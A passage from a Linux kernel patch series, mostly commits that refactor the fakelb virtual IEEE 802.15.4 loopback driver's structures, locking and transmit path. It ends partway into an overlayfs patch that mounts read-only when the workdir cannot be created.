insertions(+), 2 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index cc1c7df25009..66f99c4f9768 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -215,7 +215,7 @@ static void fakelb_del(struct fakelb_dev_priv *priv) static int fakelb_probe(struct platform_device *pdev) { struct fakelb_priv *priv; - struct fakelb_dev_priv *dp; + struct fakelb_dev_priv *dp, *tmp; int err = -ENOMEM; int i; @@ -238,7 +238,7 @@ static int fakelb_probe(struct platform_device *pdev) return 0; err_slave: - list_for_each_entry(dp, &priv->list, list) + list_for_each_entry_safe(dp, tmp, &priv->list, list) fakelb_del(dp); err_alloc: return err; From db3f5d0df9af1e5965e64595595a6a719c42fcf3 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:00 +0200 Subject: [PATCH 101/872] fakelb: rename fakelb_dev_priv to fakelb_phy This patch renames fakelb_dev_priv to fakelb_phy. We don't faking devices here, we fake wpan phys. This avoids also confusing with the variable priv, which is used several times in this driver to represent this structure. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 93 +++++++++++++++++---------------- 1 file changed, 47 insertions(+), 46 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 66f99c4f9768..5c4fbb861eb0 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -29,7 +29,7 @@ static int numlbs = 2; -struct fakelb_dev_priv { +struct fakelb_phy { struct ieee802154_hw *hw; struct list_head list; @@ -62,36 +62,37 @@ fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) } static void -fakelb_hw_deliver(struct fakelb_dev_priv *priv, struct sk_buff *skb) +fakelb_hw_deliver(struct fakelb_phy *phy, struct sk_buff *skb) { struct sk_buff *newskb; - spin_lock(&priv->lock); - if (priv->working) { + spin_lock(&phy->lock); + if (phy->working) { newskb = pskb_copy(skb, GFP_ATOMIC); if (newskb) - ieee802154_rx_irqsafe(priv->hw, newskb, 0xcc); + ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); } - spin_unlock(&priv->lock); + spin_unlock(&phy->lock); } static int fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { - struct fakelb_dev_priv *priv = hw->priv; - struct fakelb_priv *fake = priv->fake; + struct fakelb_phy *current_phy = hw->priv; + struct fakelb_priv *fake = current_phy->fake; read_lock_bh(&fake->lock); - if (priv->list.next == priv->list.prev) { + if (current_phy->list.next == current_phy->list.prev) { /* we are the only one device */ - fakelb_hw_deliver(priv, skb); + fakelb_hw_deliver(current_phy, skb); } else { - struct fakelb_dev_priv *dp; - list_for_each_entry(dp, &priv->fake->list, list) { - if (dp != priv && - (dp->hw->phy->current_channel == - priv->hw->phy->current_channel)) - fakelb_hw_deliver(dp, skb); + struct fakelb_phy *phy; + + list_for_each_entry(phy, ¤t_phy->fake->list, list) { + if (current_phy != phy && + (phy->hw->phy->current_channel == + current_phy->hw->phy->current_channel)) + fakelb_hw_deliver(phy, skb); } } read_unlock_bh(&fake->lock); @@ -101,26 +102,26 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) static int fakelb_hw_start(struct ieee802154_hw *hw) { - struct fakelb_dev_priv *priv = hw->priv; + struct fakelb_phy *phy = hw->priv; int ret = 0; - spin_lock(&priv->lock); - if (priv->working) + spin_lock(&phy->lock); + if (phy->working) ret = -EBUSY; else - priv->working = 1; - spin_unlock(&priv->lock); + phy->working = 1; + spin_unlock(&phy->lock); return ret; } static void fakelb_hw_stop(struct ieee802154_hw *hw) { - struct fakelb_dev_priv *priv = hw->priv; + struct fakelb_phy *phy = hw->priv; - spin_lock(&priv->lock); - priv->working = 0; - spin_unlock(&priv->lock); + spin_lock(&phy->lock); + phy->working = 0; + spin_unlock(&phy->lock); } static const struct ieee802154_ops fakelb_ops = { @@ -138,16 +139,16 @@ MODULE_PARM_DESC(numlbs, " number of pseudo devices"); static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) { - struct fakelb_dev_priv *priv; + struct fakelb_phy *phy; int err; struct ieee802154_hw *hw; - hw = ieee802154_alloc_hw(sizeof(*priv), &fakelb_ops); + hw = ieee802154_alloc_hw(sizeof(*phy), &fakelb_ops); if (!hw) return -ENOMEM; - priv = hw->priv; - priv->hw = hw; + phy = hw->priv; + phy->hw = hw; /* 868 MHz BPSK 802.15.4-2003 */ hw->phy->supported.channels[0] |= 1; @@ -180,10 +181,10 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) /* 950 MHz GFSK 802.15.4d-2009 */ hw->phy->supported.channels[6] |= 0x3ffc00; - INIT_LIST_HEAD(&priv->list); - priv->fake = fake; + INIT_LIST_HEAD(&phy->list); + phy->fake = fake; - spin_lock_init(&priv->lock); + spin_lock_init(&phy->lock); hw->parent = dev; @@ -192,30 +193,30 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) goto err_reg; write_lock_bh(&fake->lock); - list_add_tail(&priv->list, &fake->list); + list_add_tail(&phy->list, &fake->list); write_unlock_bh(&fake->lock); return 0; err_reg: - ieee802154_free_hw(priv->hw); + ieee802154_free_hw(phy->hw); return err; } -static void fakelb_del(struct fakelb_dev_priv *priv) +static void fakelb_del(struct fakelb_phy *phy) { - write_lock_bh(&priv->fake->lock); - list_del(&priv->list); - write_unlock_bh(&priv->fake->lock); + write_lock_bh(&phy->fake->lock); + list_del(&phy->list); + write_unlock_bh(&phy->fake->lock); - ieee802154_unregister_hw(priv->hw); - ieee802154_free_hw(priv->hw); + ieee802154_unregister_hw(phy->hw); + ieee802154_free_hw(phy->hw); } static int fakelb_probe(struct platform_device *pdev) { struct fakelb_priv *priv; - struct fakelb_dev_priv *dp, *tmp; + struct fakelb_phy *phy, *tmp; int err = -ENOMEM; int i; @@ -238,8 +239,8 @@ static int fakelb_probe(struct platform_device *pdev) return 0; err_slave: - list_for_each_entry_safe(dp, tmp, &priv->list, list) - fakelb_del(dp); + list_for_each_entry_safe(phy, tmp, &priv->list, list) + fakelb_del(phy); err_alloc: return err; } @@ -247,10 +248,10 @@ static int fakelb_probe(struct platform_device *pdev) static int fakelb_remove(struct platform_device *pdev) { struct fakelb_priv *priv = platform_get_drvdata(pdev); - struct fakelb_dev_priv *dp, *temp; + struct fakelb_phy *phy, *temp; - list_for_each_entry_safe(dp, temp, &priv->list, list) - fakelb_del(dp); + list_for_each_entry_safe(phy, temp, &priv->list, list) + fakelb_del(phy); return 0; } From 9f8b97f888445b737ea3716ca53498663e18d971 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:01 +0200 Subject: [PATCH 102/872] fakelb: don't deliver when one phy A real phy don't transmit the transmitted frame back to the phy. This behaviour will confuse the 6LoWPAN and the upper IPv6 neighbour discovery cache. We need now at least two virtual phy's to creating a virtual wpan network. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 5c4fbb861eb0..d5fb77678349 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -80,20 +80,16 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { struct fakelb_phy *current_phy = hw->priv; struct fakelb_priv *fake = current_phy->fake; + struct fakelb_phy *phy; read_lock_bh(&fake->lock); - if (current_phy->list.next == current_phy->list.prev) { - /* we are the only one device */ - fakelb_hw_deliver(current_phy, skb); - } else { - struct fakelb_phy *phy; - - list_for_each_entry(phy, ¤t_phy->fake->list, list) { - if (current_phy != phy && - (phy->hw->phy->current_channel == - current_phy->hw->phy->current_channel)) - fakelb_hw_deliver(phy, skb); - } + list_for_each_entry(phy, ¤t_phy->fake->list, list) { + if (current_phy == phy) + continue; + + if (phy->hw->phy->current_channel == + current_phy->hw->phy->current_channel) + fakelb_hw_deliver(phy, skb); } read_unlock_bh(&fake->lock); From 3335d98c69b1b09b963d09c8475c40bd8988c994 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:02 +0200 Subject: [PATCH 103/872] fakelb: declare rwlock static This patch moves the rwlock declarition into a static variable. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index d5fb77678349..43370fb48cf6 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -28,6 +28,7 @@ #include static int numlbs = 2; +static DEFINE_RWLOCK(fakelb_lock); struct fakelb_phy { struct ieee802154_hw *hw; @@ -41,7 +42,6 @@ struct fakelb_phy { struct fakelb_priv { struct list_head list; - rwlock_t lock; }; static int @@ -79,10 +79,9 @@ static int fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { struct fakelb_phy *current_phy = hw->priv; - struct fakelb_priv *fake = current_phy->fake; struct fakelb_phy *phy; - read_lock_bh(&fake->lock); + read_lock_bh(&fakelb_lock); list_for_each_entry(phy, ¤t_phy->fake->list, list) { if (current_phy == phy) continue; @@ -91,7 +90,7 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) current_phy->hw->phy->current_channel) fakelb_hw_deliver(phy, skb); } - read_unlock_bh(&fake->lock); + read_unlock_bh(&fakelb_lock); return 0; } @@ -188,9 +187,9 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) if (err) goto err_reg; - write_lock_bh(&fake->lock); + write_lock_bh(&fakelb_lock); list_add_tail(&phy->list, &fake->list); - write_unlock_bh(&fake->lock); + write_unlock_bh(&fakelb_lock); return 0; @@ -201,9 +200,9 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) static void fakelb_del(struct fakelb_phy *phy) { - write_lock_bh(&phy->fake->lock); + write_lock_bh(&fakelb_lock); list_del(&phy->list); - write_unlock_bh(&phy->fake->lock); + write_unlock_bh(&fakelb_lock); ieee802154_unregister_hw(phy->hw); ieee802154_free_hw(phy->hw); @@ -222,7 +221,6 @@ static int fakelb_probe(struct platform_device *pdev) goto err_alloc; INIT_LIST_HEAD(&priv->list); - rwlock_init(&priv->lock); for (i = 0; i < numlbs; i++) { err = fakelb_add_one(&pdev->dev, priv); From b82b99f16bc207291b14228441cfffbfd23d5f49 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:03 +0200 Subject: [PATCH 104/872] fakelb: declare fakelb list static This patch moves the fakelb list of all registered phy's in a static declaration in the fakelb driver. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 32 +++++++------------------------- 1 file changed, 7 insertions(+), 25 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 43370fb48cf6..c7e7d506224f 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -29,21 +29,17 @@ static int numlbs = 2; static DEFINE_RWLOCK(fakelb_lock); +static LIST_HEAD(fakelb_phys); struct fakelb_phy { struct ieee802154_hw *hw; struct list_head list; - struct fakelb_priv *fake; spinlock_t lock; bool working; }; -struct fakelb_priv { - struct list_head list; -}; - static int fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) { @@ -82,7 +78,7 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) struct fakelb_phy *phy; read_lock_bh(&fakelb_lock); - list_for_each_entry(phy, ¤t_phy->fake->list, list) { + list_for_each_entry(phy, &fakelb_phys, list) { if (current_phy == phy) continue; @@ -132,7 +128,7 @@ static const struct ieee802154_ops fakelb_ops = { module_param(numlbs, int, 0); MODULE_PARM_DESC(numlbs, " number of pseudo devices"); -static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) +static int fakelb_add_one(struct device *dev) { struct fakelb_phy *phy; int err; @@ -176,9 +172,6 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) /* 950 MHz GFSK 802.15.4d-2009 */ hw->phy->supported.channels[6] |= 0x3ffc00; - INIT_LIST_HEAD(&phy->list); - phy->fake = fake; - spin_lock_init(&phy->lock); hw->parent = dev; @@ -188,7 +181,7 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) goto err_reg; write_lock_bh(&fakelb_lock); - list_add_tail(&phy->list, &fake->list); + list_add_tail(&phy->list, &fakelb_phys); write_unlock_bh(&fakelb_lock); return 0; @@ -210,41 +203,30 @@ static void fakelb_del(struct fakelb_phy *phy) static int fakelb_probe(struct platform_device *pdev) { - struct fakelb_priv *priv; struct fakelb_phy *phy, *tmp; int err = -ENOMEM; int i; - priv = devm_kzalloc(&pdev->dev, sizeof(struct fakelb_priv), - GFP_KERNEL); - if (!priv) - goto err_alloc; - - INIT_LIST_HEAD(&priv->list); - for (i = 0; i < numlbs; i++) { - err = fakelb_add_one(&pdev->dev, priv); + err = fakelb_add_one(&pdev->dev); if (err < 0) goto err_slave; } - platform_set_drvdata(pdev, priv); dev_info(&pdev->dev, "added ieee802154 hardware\n"); return 0; err_slave: - list_for_each_entry_safe(phy, tmp, &priv->list, list) + list_for_each_entry_safe(phy, tmp, &fakelb_phys, list) fakelb_del(phy); -err_alloc: return err; } static int fakelb_remove(struct platform_device *pdev) { - struct fakelb_priv *priv = platform_get_drvdata(pdev); struct fakelb_phy *phy, *temp; - list_for_each_entry_safe(phy, temp, &priv->list, list) + list_for_each_entry_safe(phy, temp, &fakelb_phys, list) fakelb_del(phy); return 0; From 6fa2cffe8cf937fc10be362a2dcac8a5965f618e Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:04 +0200 Subject: [PATCH 105/872] fakelb: move lock out of iteration The list need to be protected while iteration which is need when other list iterates at the same time over this list. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index c7e7d506224f..e1c0195c18aa 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -193,9 +193,7 @@ static int fakelb_add_one(struct device *dev) static void fakelb_del(struct fakelb_phy *phy) { - write_lock_bh(&fakelb_lock); list_del(&phy->list); - write_unlock_bh(&fakelb_lock); ieee802154_unregister_hw(phy->hw); ieee802154_free_hw(phy->hw); @@ -217,8 +215,10 @@ static int fakelb_probe(struct platform_device *pdev) return 0; err_slave: + write_lock_bh(&fakelb_lock); list_for_each_entry_safe(phy, tmp, &fakelb_phys, list) fakelb_del(phy); + write_unlock_bh(&fakelb_lock); return err; } @@ -226,9 +226,10 @@ static int fakelb_remove(struct platform_device *pdev) { struct fakelb_phy *phy, *temp; + write_lock_bh(&fakelb_lock); list_for_each_entry_safe(phy, temp, &fakelb_phys, list) fakelb_del(phy); - + write_unlock_bh(&fakelb_lock); return 0; } From e369dc8f1aa95cd490e1ab75043dcf50d2190453 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:05 +0200 Subject: [PATCH 106/872] fakelb: introduce fakelb ifup phys list This patch introduce a fakelb ifup phys list, which stores all registered phys which are in an operated mode. This will reduce the iterations of non-operated phys while transmit frames. There exists two locks now, one rwlock for the operated interfaces and the spinlock for protecting the list for all registered virtual phys. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 58 ++++++++++++++------------------- 1 file changed, 25 insertions(+), 33 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index e1c0195c18aa..83957de47243 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -28,16 +28,18 @@ #include static int numlbs = 2; -static DEFINE_RWLOCK(fakelb_lock); + static LIST_HEAD(fakelb_phys); +static DEFINE_SPINLOCK(fakelb_phys_lock); + +static LIST_HEAD(fakelb_ifup_phys); +static DEFINE_RWLOCK(fakelb_ifup_phys_lock); struct fakelb_phy { struct ieee802154_hw *hw; struct list_head list; - - spinlock_t lock; - bool working; + struct list_head list_ifup; }; static int @@ -62,13 +64,9 @@ fakelb_hw_deliver(struct fakelb_phy *phy, struct sk_buff *skb) { struct sk_buff *newskb; - spin_lock(&phy->lock); - if (phy->working) { - newskb = pskb_copy(skb, GFP_ATOMIC); - if (newskb) - ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); - } - spin_unlock(&phy->lock); + newskb = pskb_copy(skb, GFP_ATOMIC); + if (newskb) + ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); } static int @@ -77,8 +75,8 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) struct fakelb_phy *current_phy = hw->priv; struct fakelb_phy *phy; - read_lock_bh(&fakelb_lock); - list_for_each_entry(phy, &fakelb_phys, list) { + read_lock_bh(&fakelb_ifup_phys_lock); + list_for_each_entry(phy, &fakelb_ifup_phys, list_ifup) { if (current_phy == phy) continue; @@ -86,7 +84,7 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) current_phy->hw->phy->current_channel) fakelb_hw_deliver(phy, skb); } - read_unlock_bh(&fakelb_lock); + read_unlock_bh(&fakelb_ifup_phys_lock); return 0; } @@ -94,25 +92,21 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) static int fakelb_hw_start(struct ieee802154_hw *hw) { struct fakelb_phy *phy = hw->priv; - int ret = 0; - spin_lock(&phy->lock); - if (phy->working) - ret = -EBUSY; - else - phy->working = 1; - spin_unlock(&phy->lock); + write_lock_bh(&fakelb_ifup_phys_lock); + list_add(&phy->list_ifup, &fakelb_ifup_phys); + write_unlock_bh(&fakelb_ifup_phys_lock); - return ret; + return 0; } static void fakelb_hw_stop(struct ieee802154_hw *hw) { struct fakelb_phy *phy = hw->priv; - spin_lock(&phy->lock); - phy->working = 0; - spin_unlock(&phy->lock); + write_lock_bh(&fakelb_ifup_phys_lock); + list_del(&phy->list_ifup); + write_unlock_bh(&fakelb_ifup_phys_lock); } static const struct ieee802154_ops fakelb_ops = { @@ -172,17 +166,15 @@ static int fakelb_add_one(struct device *dev) /* 950 MHz GFSK 802.15.4d-2009 */ hw->phy->supported.channels[6] |= 0x3ffc00; - spin_lock_init(&phy->lock); - hw->parent = dev; err = ieee802154_register_hw(hw); if (err) goto err_reg; - write_lock_bh(&fakelb_lock); + spin_lock(&fakelb_phys_lock); list_add_tail(&phy->list, &fakelb_phys); - write_unlock_bh(&fakelb_lock); + spin_unlock(&fakelb_phys_lock); return 0; @@ -215,10 +207,10 @@ static int fakelb_probe(struct platform_device *pdev) return 0; err_slave: - write_lock_bh(&fakelb_lock); + spin_lock(&fakelb_phys_lock); list_for_each_entry_safe(phy, tmp, &fakelb_phys, list) fakelb_del(phy); - write_unlock_bh(&fakelb_lock); + spin_unlock(&fakelb_phys_lock); return err; } @@ -226,10 +218,10 @@ static int fakelb_remove(struct platform_device *pdev) { struct fakelb_phy *phy, *temp; - write_lock_bh(&fakelb_lock); + spin_lock(&fakelb_phys_lock); list_for_each_entry_safe(phy, temp, &fakelb_phys, list) fakelb_del(phy); - write_unlock_bh(&fakelb_lock); + spin_unlock(&fakelb_phys_lock); return 0; } From 12da8d97ab3239101077a415c2587bfbf6725216 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:06 +0200 Subject: [PATCH 107/872] fakelb: use own channel and page attributes This patch adds an own phy attribute for page and channel into fakelb_phy. The current way is to use the internal mac802154 stored phy pib values which can occur in locking issues while using it inside the driver layer. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 83957de47243..c60837e0df25 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -38,6 +38,9 @@ static DEFINE_RWLOCK(fakelb_ifup_phys_lock); struct fakelb_phy { struct ieee802154_hw *hw; + u8 page; + u8 channel; + struct list_head list; struct list_head list_ifup; }; @@ -54,8 +57,12 @@ fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) static int fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) { - pr_debug("set channel to %d\n", channel); + struct fakelb_phy *phy = hw->priv; + write_lock_bh(&fakelb_ifup_phys_lock); + phy->page = page; + phy->channel = channel; + write_unlock_bh(&fakelb_ifup_phys_lock); return 0; } @@ -80,8 +87,8 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) if (current_phy == phy) continue; - if (phy->hw->phy->current_channel == - current_phy->hw->phy->current_channel) + if (current_phy->page == phy->page && + current_phy->channel == phy->channel) fakelb_hw_deliver(phy, skb); } read_unlock_bh(&fakelb_ifup_phys_lock); From e214a9040a602552d40d0c71cdb38fac8f619cd6 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:07 +0200 Subject: [PATCH 108/872] fakelb: add virtual phy reset defaults This patch adds reset defaults for the fakelb phy. I used the channel 13 and page 0 which is the same default like at86rf233. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index c60837e0df25..d693a539f8f3 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -173,6 +173,11 @@ static int fakelb_add_one(struct device *dev) /* 950 MHz GFSK 802.15.4d-2009 */ hw->phy->supported.channels[6] |= 0x3ffc00; + ieee802154_random_extended_addr(&hw->phy->perm_extended_addr); + /* fake phy channel 13 as default */ + hw->phy->current_channel = 13; + phy->channel = hw->phy->current_channel; + hw->parent = dev; err = ieee802154_register_hw(hw); From 98be165b4355f750a62ca5ad280e04a135fe9bbd Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:08 +0200 Subject: [PATCH 109/872] fakelb: remove fakelb_hw_deliver This patch cleanups the fakelb_hw_deliver function by removing them. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index d693a539f8f3..10e2d27dbed4 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -66,16 +66,6 @@ fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) return 0; } -static void -fakelb_hw_deliver(struct fakelb_phy *phy, struct sk_buff *skb) -{ - struct sk_buff *newskb; - - newskb = pskb_copy(skb, GFP_ATOMIC); - if (newskb) - ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); -} - static int fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { @@ -88,8 +78,12 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) continue; if (current_phy->page == phy->page && - current_phy->channel == phy->channel) - fakelb_hw_deliver(phy, skb); + current_phy->channel == phy->channel) { + struct sk_buff *newskb = pskb_copy(skb, GFP_ATOMIC); + + if (newskb) + ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); + } } read_unlock_bh(&fakelb_ifup_phys_lock); From a09c07a8c89ee910f97d09577ec30b3084fb1d6a Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:09 +0200 Subject: [PATCH 110/872] fakelb: add support for async xmit handling This patch will add async xmit support for the fakelb driver. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 10e2d27dbed4..8f37ea0fa1f5 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -87,6 +87,7 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) } read_unlock_bh(&fakelb_ifup_phys_lock); + ieee802154_xmit_complete(hw, skb, false); return 0; } @@ -112,7 +113,7 @@ fakelb_hw_stop(struct ieee802154_hw *hw) { static const struct ieee802154_ops fakelb_ops = { .owner = THIS_MODULE, - .xmit_sync = fakelb_hw_xmit, + .xmit_async = fakelb_hw_xmit, .ed = fakelb_hw_ed, .set_channel = fakelb_hw_channel, .start = fakelb_hw_start, From 39572ab30feb92a8d49bf2a59c9a492ba858c008 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:10 +0200 Subject: [PATCH 111/872] fakelb: cleanup code This patch just cleanups the code at several places. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 29 ++++++++++++----------------- 1 file changed, 12 insertions(+), 17 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 8f37ea0fa1f5..9d0da4ec3e8c 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -45,8 +45,7 @@ struct fakelb_phy { struct list_head list_ifup; }; -static int -fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) +static int fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) { BUG_ON(!level); *level = 0xbe; @@ -54,8 +53,7 @@ fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) return 0; } -static int -fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) +static int fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) { struct fakelb_phy *phy = hw->priv; @@ -66,11 +64,9 @@ fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) return 0; } -static int -fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) +static int fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { - struct fakelb_phy *current_phy = hw->priv; - struct fakelb_phy *phy; + struct fakelb_phy *current_phy = hw->priv, *phy; read_lock_bh(&fakelb_ifup_phys_lock); list_for_each_entry(phy, &fakelb_ifup_phys, list_ifup) { @@ -91,8 +87,8 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) return 0; } -static int -fakelb_hw_start(struct ieee802154_hw *hw) { +static int fakelb_hw_start(struct ieee802154_hw *hw) +{ struct fakelb_phy *phy = hw->priv; write_lock_bh(&fakelb_ifup_phys_lock); @@ -102,8 +98,8 @@ fakelb_hw_start(struct ieee802154_hw *hw) { return 0; } -static void -fakelb_hw_stop(struct ieee802154_hw *hw) { +static void fakelb_hw_stop(struct ieee802154_hw *hw) +{ struct fakelb_phy *phy = hw->priv; write_lock_bh(&fakelb_ifup_phys_lock); @@ -126,9 +122,9 @@ MODULE_PARM_DESC(numlbs, " number of pseudo devices"); static int fakelb_add_one(struct device *dev) { + struct ieee802154_hw *hw; struct fakelb_phy *phy; int err; - struct ieee802154_hw *hw; hw = ieee802154_alloc_hw(sizeof(*phy), &fakelb_ops); if (!hw) @@ -201,8 +197,7 @@ static void fakelb_del(struct fakelb_phy *phy) static int fakelb_probe(struct platform_device *pdev) { struct fakelb_phy *phy, *tmp; - int err = -ENOMEM; - int i; + int err, i; for (i = 0; i < numlbs; i++) { err = fakelb_add_one(&pdev->dev); @@ -223,10 +218,10 @@ static int fakelb_probe(struct platform_device *pdev) static int fakelb_remove(struct platform_device *pdev) { - struct fakelb_phy *phy, *temp; + struct fakelb_phy *phy, *tmp; spin_lock(&fakelb_phys_lock); - list_for_each_entry_safe(phy, temp, &fakelb_phys, list) + list_for_each_entry_safe(phy, tmp, &fakelb_phys, list) fakelb_del(phy); spin_unlock(&fakelb_phys_lock); return 0; From cc6f67bcafcb6bbbb2d1be1603dcd95125a52800 Mon Sep 17 00:00:00 2001 From: Miklos Szeredi Date: Tue, 19 May 2015 14:30:12 +0200 Subject: [PATCH 112/872] ovl: mount read-only if workdir can't be created OpenWRT folks reported that overlayfs fails to mount if upper fs is full, because workdir can't be created. Wordir creation can fail for various other reasons too. There's no reason that the mount itself should fail, overlayfs can work fine without a workdir, as long as the overlay isn't modified. So mount it read-only and don't allow remounting read-write. Add a couple of WARN_ON()s for the impossible case of workdir being used despite being read-only. Reported-by: Bastian Bittorf Signed-off-by: Miklos Szeredi Cc: # v3.18+ --- fs/overlayfs/copy_up.c | 3 +++ fs/overlayfs/dir.c | 9 +++++++++ fs/overlayfs/super.c | 10 +++++----- 3 files changed, 17 insertions(+), 5 deletions(-) diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c index 24f640441bd9..84d693d37428 100644 --- a/fs/overlayfs/copy_up.c +++ b/fs/overlayfs/copy_up.c @@ -299,6 +299,9 @@ int ovl_copy_up_one(struct dentry *parent, struct dentry *dentry, struct cred *override_cred; char *link = NULL; + if (WARN_ON(!workdir)) + return 